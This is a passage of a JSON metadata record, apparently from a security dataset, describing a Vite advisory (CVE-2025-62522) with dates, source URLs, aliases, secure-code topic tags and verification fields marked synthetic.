"published_at": "2025-10-20T19:54:28Z",
"updated_at": "2026-02-04T04:13:38.886554Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-62522",
"https://github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-62522",
"GHSA-93m4-6634-74q7"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
}
}